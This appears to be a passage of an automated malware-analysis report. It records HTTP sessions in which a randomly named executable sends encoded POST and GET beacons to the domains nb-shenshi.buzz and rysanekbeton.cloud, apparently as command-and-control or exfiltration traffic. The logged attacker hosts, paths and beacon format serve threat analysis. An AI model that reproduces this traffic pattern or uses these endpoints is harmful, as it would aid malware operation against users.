%iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 20, 2024 04:20:35.410264969 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	64853	161.97.168.245	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:37.366869926 CET	759	OUT	POST /1mwk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.nb-shenshi.buzz Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/1mwk/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 58 4e 58 41 77 59 33 70 4d 33 6a 76 49 31 73 4b 79 54 6d 6d 6a 35 52 42 31 43 59 39 41 75 35 42 6a 68 45 70 48 44 39 55 68 35 71 77 45 74 31 57 48 61 44 38 70 45 41 71 6e 4c 73 38 78 63 47 38 52 4c 72 41 6c 46 4e 2f 43 77 32 65 44 69 49 58 2b 30 77 6b 69 61 44 64 47 39 6f 66 41 30 4e 6b 62 4d 4a 42 51 51 46 36 50 38 62 49 51 66 59 6c 75 53 6e 54 53 42 71 33 7a 54 78 67 4e 4a 78 38 54 63 37 37 45 46 48 44 32 31 4a 71 78 7a 56 45 30 4e 39 41 66 4a 51 30 67 67 4e 65 68 55 71 56 7a 4b 58 6e 4e 79 74 4c 46 32 48 6b 4c 43 56 4f 4b 32 6d 62 31 38 61 67 35 6b 38 47 50 39 6b 55 61 74 43 4b 51 61 37 70 73 4c 5a 4b 4d 49 69 34 5a 61 31 7a 71 47 55 3d Data Ascii: xDq=XNXAwY3pM3jvI1sKyTmmj5RB1CY9Au5BjhEpHD9Uh5qwEt1WHaD8pEAqnLs8xcG8RLrAlFN/Cw2eDiIX+0wkiaDdG9ofA0NkbMJBQQF6P8bIQfYluSnTSBq3zTxgNJx8Tc77EFHD21JqxzVE0N9AfJQ0ggNehUqVzKXnNytLF2HkLCVOK2mb18ag5k8GP9kUatCKQa7psLZKMIi4Za1zqGU=
Nov 20, 2024 04:20:37.960627079 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 20, 2024 04:20:37.960681915 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	64854	161.97.168.245	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:39.918199062 CET	10841	OUT	POST /1mwk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.nb-shenshi.buzz Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/1mwk/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 58 4e 58 41 77 59 33 70 4d 33 6a 76 49 31 73 4b 79 54 6d 6d 6a 35 52 42 31 43 59 39 41 75 35 42 6a 68 45 70 48 44 39 55 68 35 79 77 45 66 4e 57 56 4e 58 38 75 45 41 71 76 72 73 39 78 63 48 6d 52 4b 44 4d 6c 46 42 56 43 79 2b 65 42 42 41 58 71 56 77 6b 6f 61 44 64 45 39 6f 61 59 55 4e 78 62 4d 59 47 51 51 56 36 50 38 62 49 51 5a 30 6c 74 44 6e 54 51 42 71 30 77 54 78 73 63 5a 78 41 54 63 6a 4e 45 46 54 70 32 42 46 71 77 54 46 45 33 37 4a 41 54 4a 51 79 6a 67 4e 57 68 55 58 56 7a 4b 4c 38 4e 7a 5a 68 46 30 62 6b 49 6d 67 74 51 79 71 2b 69 50 53 61 38 6c 6f 69 4b 73 45 33 56 4b 65 6f 65 72 37 72 30 35 4e 53 48 59 66 64 62 70 68 79 7a 57 7a 75 42 49 45 70 4e 76 63 4a 37 76 6c 37 77 38 4e 56 61 47 6c 32 73 36 79 68 4f 51 30 52 6b 6d 50 34 45 54 43 6f 4f 61 59 43 73 6d 55 2b 56 64 48 4d 30 57 6b 74 50 49 2f 48 6e 6f 6b 46 49 73 31 65 54 4f 5a 70 53 44 69 5a 6e 64 4d 77 2f 6c 62 76 64 6f 6d 6f 39 56 4b 44 59 65 78 78 58 59 6d 34 6d 6e 53 6a 68 51 77 36 55 6b 47 54 51 65 2f 70 48 42 6d 30 38 56 [TRUNCATED] Data Ascii: xDq=XNXAwY3pM3jvI1sKyTmmj5RB1CY9Au5BjhEpHD9Uh5ywEfNWVNX8uEAqvrs9xcHmRKDMlFBVCy+eBBAXqVwkoaDdE9oaYUNxbMYGQQV6P8bIQZ0ltDnTQBq0wTxscZxATcjNEFTp2BFqwTFE37JATJQyjgNWhUXVzKL8NzZhF0bkImgtQyq+iPSa8loiKsE3VKeoer7r05NSHYfdbphyzWzuBIEpNvcJ7vl7w8NVaGl2s6yhOQ0RkmP4ETCoOaYCsmU+VdHM0WktPI/HnokFIs1eTOZpSDiZndMw/lbvdomo9VKDYexxXYm4mnSjhQw6UkGTQe/pHBm08VqV+GLP3zl/7hckKCFCrcpKhrKpET6zF6YkhvIJSRnBqBDotg4BLoHJLJJAlnopBnIwPx/JiTEAgsDJiZWBEuwNq21edPycn8V+L2Q7kfKGKzE2wGQtoSLcHPyiPeRfvbEzmaivggNowj8Vje1jQydIdWy6IyWOJuQ77tSxIPDVNeKUOVMwbi8oHW4aTxwJ0CLh06VNz3W0kgRd5v9HDAVdCgUJ0UQEQGVn+jG+JjYWQTSqKN49FlqXYiORpP7giJJQ43dkBRfYqFCSOeJG3cwu/GyDZfaDJn1/NtFhHNYKeiWOZL5/AUIhkSMs42Bd5tKVAQJs465bJa5utobxQq4TaBiYpOaP4/47Hy0Oppi+j3QljCaDLqBMzs9ZaPTQ87GIgWQAla/V+BfOMnhz+Up7axwuN+2NX2OXIiND7JVPmZBrwxPwBXb2i749ow0I5YzkpCejTC4x0pC5VO/JEWVNOwlcUq8UcsneaH7hpytIFIcyV/vAyskZxttoSlcnlY2+CxuoQapz1x0J01o2dlU6OOn+TFq+Ev66lbAgZzlQnxKAhLuac2n7LYgI8ruz4ZSBRlag7RmGZ3W8FTrAr18Lk6kl6lQGi6ZnqP1HGeZIQqII2knTr384viEtr2xExPDhQAbDUCPUagH/ssW1tBaMX05ZZarKX3xa [TRUNCATED]
Nov 20, 2024 04:20:40.505414963 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 20, 2024 04:20:40.505465984 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	64855	161.97.168.245	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:42.457138062 CET	471	OUT	GET /1mwk/?Lhx=fPAh7htHyFPl-&xDq=aP/gzvnIJweJBGAM8k6pu85FwARGRrJi7lENLyBMprrjHPxpI72KmSEUutQfwM36acX1gmYQGU/DOh8WpWJogojdJuslZQVWDuA2Yws6YeX4RtAi+znuQho= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.nb-shenshi.buzz User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:20:43.056360006 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 20, 2024 04:20:43.056408882 CET	1236	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 20, 2024 04:20:43.056447029 CET	698	IN	Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	64856	81.2.196.19	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:48.148305893 CET	748	OUT	POST /3g99/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.rysanekbeton.cloud Origin: http://www.rysanekbeton.cloud Referer: http://www.rysanekbeton.cloud/3g99/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 63 77 46 74 64 75 42 35 51 50 6a 65 33 42 75 6c 4b 65 46 59 30 66 5a 70 79 69 74 79 4f 78 4b 6e 71 45 35 67 59 6d 68 31 59 7a 5a 31 34 32 57 79 46 65 30 68 2b 51 49 6c 55 50 41 52 34 76 68 67 7a 54 58 46 4e 57 78 79 71 43 6a 51 69 46 66 6b 4a 4c 47 30 63 67 43 55 50 49 70 62 56 6e 65 32 63 50 38 35 4a 41 30 64 53 52 68 33 37 42 39 4b 68 4f 58 48 79 77 65 4d 44 4a 35 59 2b 33 76 4c 74 44 41 4c 74 48 78 2f 42 32 4d 38 4a 6b 6b 43 32 6b 4e 48 39 4c 50 74 6a 34 42 50 5a 61 59 34 50 2b 74 42 78 2b 6b 33 59 39 63 6c 72 6c 34 2b 67 71 75 52 52 33 52 54 53 53 39 79 64 6f 70 42 65 67 3d 3d Data Ascii: xDq=cwFtduB5QPje3BulKeFY0fZpyityOxKnqE5gYmh1YzZ142WyFe0h+QIlUPAR4vhgzTXFNWxyqCjQiFfkJLG0cgCUPIpbVne2cP85JA0dSRh37B9KhOXHyweMDJ5Y+3vLtDALtHx/B2M8JkkC2kNH9LPtj4BPZaY4P+tBx+k3Y9clrl4+gquRR3RTSS9ydopBeg==
Nov 20, 2024 04:20:48.772876978 CET	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	64857	81.2.196.19	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:50.699919939 CET	768	OUT	POST /3g99/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.rysanekbeton.cloud Origin: http://www.rysanekbeton.cloud Referer: http://www.rysanekbeton.cloud/3g99/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 63 77 46 74 64 75 42 35 51 50 6a 65 78 53 6d 6c 47 66 46 59 34 76 5a 75 2b 43 74 79 56 68 4b 37 71 45 31 67 59 6b 51 6f 62 46 70 31 37 58 47 79 45 66 30 68 74 67 49 6c 66 76 41 75 32 50 68 72 7a 54 62 72 4e 55 56 79 71 43 6e 51 69 41 37 6b 4a 36 47 33 64 77 43 57 45 6f 70 5a 59 48 65 32 63 50 38 35 4a 42 52 32 53 52 70 33 37 79 6c 4b 6a 71 6a 59 70 51 65 4c 53 4a 35 59 7a 58 76 50 74 44 41 74 74 47 74 42 42 31 6b 38 4a 6d 38 43 33 78 68 49 30 4c 50 72 75 59 41 62 4b 62 49 79 42 63 4d 61 30 64 6f 78 52 66 73 42 6e 44 31 6b 78 62 50 47 44 33 31 67 50 56 30 47 51 72 55 49 46 68 46 41 51 4d 51 76 38 50 46 4d 76 6f 34 79 33 4b 48 51 7a 62 51 3d Data Ascii: xDq=cwFtduB5QPjexSmlGfFY4vZu+CtyVhK7qE1gYkQobFp17XGyEf0htgIlfvAu2PhrzTbrNUVyqCnQiA7kJ6G3dwCWEopZYHe2cP85JBR2SRp37ylKjqjYpQeLSJ5YzXvPtDAttGtBB1k8Jm8C3xhI0LPruYAbKbIyBcMa0doxRfsBnD1kxbPGD31gPV0GQrUIFhFAQMQv8PFMvo4y3KHQzbQ=
Nov 20, 2024 04:20:51.364909887 CET	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	64858	81.2.196.19	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:53.245126009 CET	10850	OUT	POST /3g99/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.rysanekbeton.cloud Origin: http://www.rysanekbeton.cloud Referer: http://www.rysanekbeton.cloud/3g99/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 63 77 46 74 64 75 42 35 51 50 6a 65 78 53 6d 6c 47 66 46 59 34 76 5a 75 2b 43 74 79 56 68 4b 37 71 45 31 67 59 6b 51 6f 62 46 68 31 37 6e 61 79 46 38 4d 68 75 67 49 6c 44 66 41 72 32 50 68 4d 7a 54 44 6e 4e 55 59 4e 71 45 37 51 6a 69 7a 6b 50 4f 53 33 58 77 43 57 4c 49 70 59 56 6e 65 6a 63 50 73 6c 4a 42 42 32 53 52 70 33 37 31 64 4b 6e 2b 58 59 75 67 65 4d 44 4a 35 55 2b 33 76 6a 74 44 4a 57 74 47 6f 36 47 46 45 38 49 46 45 43 30 44 5a 49 2f 4c 50 70 39 6f 41 54 4b 62 46 6f 42 63 67 57 30 65 30 58 52 63 77 42 6b 58 34 44 6d 36 72 63 59 30 5a 4a 4e 46 77 4d 66 4b 34 32 47 52 42 6c 63 64 63 61 68 4d 78 6d 74 71 5a 4c 70 66 76 34 6f 63 6a 46 75 6d 4e 34 49 30 56 64 36 42 6f 76 34 78 59 2f 41 6c 45 2b 5a 30 35 33 2f 4c 7a 63 62 63 35 2b 45 59 30 65 7a 47 56 74 35 45 6a 33 79 69 79 43 2f 63 70 65 76 46 71 39 4c 42 33 4c 39 65 50 39 6d 78 4b 59 67 2b 54 52 2b 6a 4d 43 69 35 45 66 77 58 32 61 4b 34 66 50 42 52 39 6c 39 33 34 2b 36 58 71 50 6a 65 64 4e 74 58 6e 35 34 76 43 63 72 48 56 62 43 63 [TRUNCATED] Data Ascii: xDq=cwFtduB5QPjexSmlGfFY4vZu+CtyVhK7qE1gYkQobFh17nayF8MhugIlDfAr2PhMzTDnNUYNqE7QjizkPOS3XwCWLIpYVnejcPslJBB2SRp371dKn+XYugeMDJ5U+3vjtDJWtGo6GFE8IFEC0DZI/LPp9oATKbFoBcgW0e0XRcwBkX4Dm6rcY0ZJNFwMfK42GRBlcdcahMxmtqZLpfv4ocjFumN4I0Vd6Bov4xY/AlE+Z053/Lzcbc5+EY0ezGVt5Ej3yiyC/cpevFq9LB3L9eP9mxKYg+TR+jMCi5EfwX2aK4fPBR9l934+6XqPjedNtXn54vCcrHVbCcur7D1QKKT3Tpo8kVeDz2DvXF+FoedhpZGjfOYBU9+0f+3LYsrtSEoYEj+KazPxgka+S9PpqeEEskEX1y8NS+qE7csIh32Z8rPvpeAcu2rMk+ycpL7SqPHgS19V8VfvZducf2nIaBw/loCM6pGizqCoqXTmgfPgE38FLTCUbmaN1LRaI/Brxz9djPjSMIwTVdwLaNhcqS4cjVmYD44sIay/Q5HummeM9a8SC8j5MqU7HHZTFeKXYrCE2ty0TTKU2h8UhGKV22hiIjuqIS/IY5lmVom9FHL8hHH/IqWuNLBJpxZdnk//LR2R7yd32DfTQ63aI3+DZ+eB813R0D58W08V7oN2giK42EB3qe6x6rohgp9ygF9GhTXM1ryo9RRn9MVeVYBN7o4ggEPZC6P8yo7IRvVgeXwXg1llWDDIc1WT+j0GMNz8/9Nhp4oMmWhvml3SSKTnzposLmdzXXdD1Dvvc0qzpXsS1BI2+9rTyNtK